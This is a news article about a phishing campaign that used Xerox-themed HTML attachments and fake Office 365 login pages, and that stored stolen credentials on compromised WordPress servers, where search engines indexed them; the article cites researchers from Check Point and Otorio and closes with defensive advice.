A major phishing campaign has recently been identified, targeting businesses worldwide and successfully circumventing Microsoft Office 365’s Advanced Threat Protection (ATP). This offensive has reportedly led to the credentials of over a thousand corporate employees being compromised, with origins traced back to August of the previous year. According to a joint analysis by Check Point Research and cybersecurity firm Otorio, energy and construction sectors appear to be the primary targets of these attacks.
What distinguishes this phishing operation is an apparent lapse in operational security that inadvertently exposed the stolen credentials on the public internet. Search engines could easily index these credentials, allowing bad actors unfettered access. “A simple Google search could have revealed the password for a compromised email address, effectively giving opportunistic attackers free rein,” the researchers stated.
The attack vector utilized phishing lures disguised as notifications from Xerox (or Xeros), which contained HTML file attachments. Upon opening these files, victims were prompted to enter their Office 365 passwords on a counterfeit login page. This information was then extracted and dispatched to a remote server stored in a text file.
The JavaScript code responsible for credential exfiltration was reportedly refined to evade detection by most antivirus solutions, creating a “realistic” user experience designed to deceive victims into entering their login information. The attackers also leveraged specialized infrastructure, including compromised WordPress servers, as a “drop zone” for the stolen credentials. This method exploited the reputation of legitimate websites to evade heightened security scrutiny.
Due to the method of storage, the compromised credentials were indexed by search engines, offering unimpeded access to any malicious actor seeking these passwords. Researchers traced the emails associated with this campaign back to a Linux server hosted on the Microsoft Azure platform. These were distributed using PHP Mailer 6.1.5 and delivered through 1&1 Ionos email servers, indicating a sophisticated level of planning on the attackers’ part.
Given the nature of the email headers analyzed, it is likely that the compromised IONOS account credentials were instrumental in disseminating the Office 365-themed spam, a tactic that further underscores the breadth of the attackers’ strategy.
To counter such threats, monitoring for emails from unfamiliar sources and scrutinizing lookalike domains is critical. Users are urged to avoid clicking on dubious links and to uphold strong password hygiene to bolster their account security. According to Lotem Finkelsteen, head of threat intelligence at Check Point, “While many assume that stolen passwords will only be sold on the dark web, in this scenario, the entire public had access to the compromised information.”
The attackers employed a strategy designed to consolidate stolen details on a designated webpage they had created. This method allowed them to periodically scan the compromised servers for credentials, unaware that search engines could easily do the same. This significant failure in operational security highlights the vulnerabilities that exist even among sophisticated cybercriminal operations.
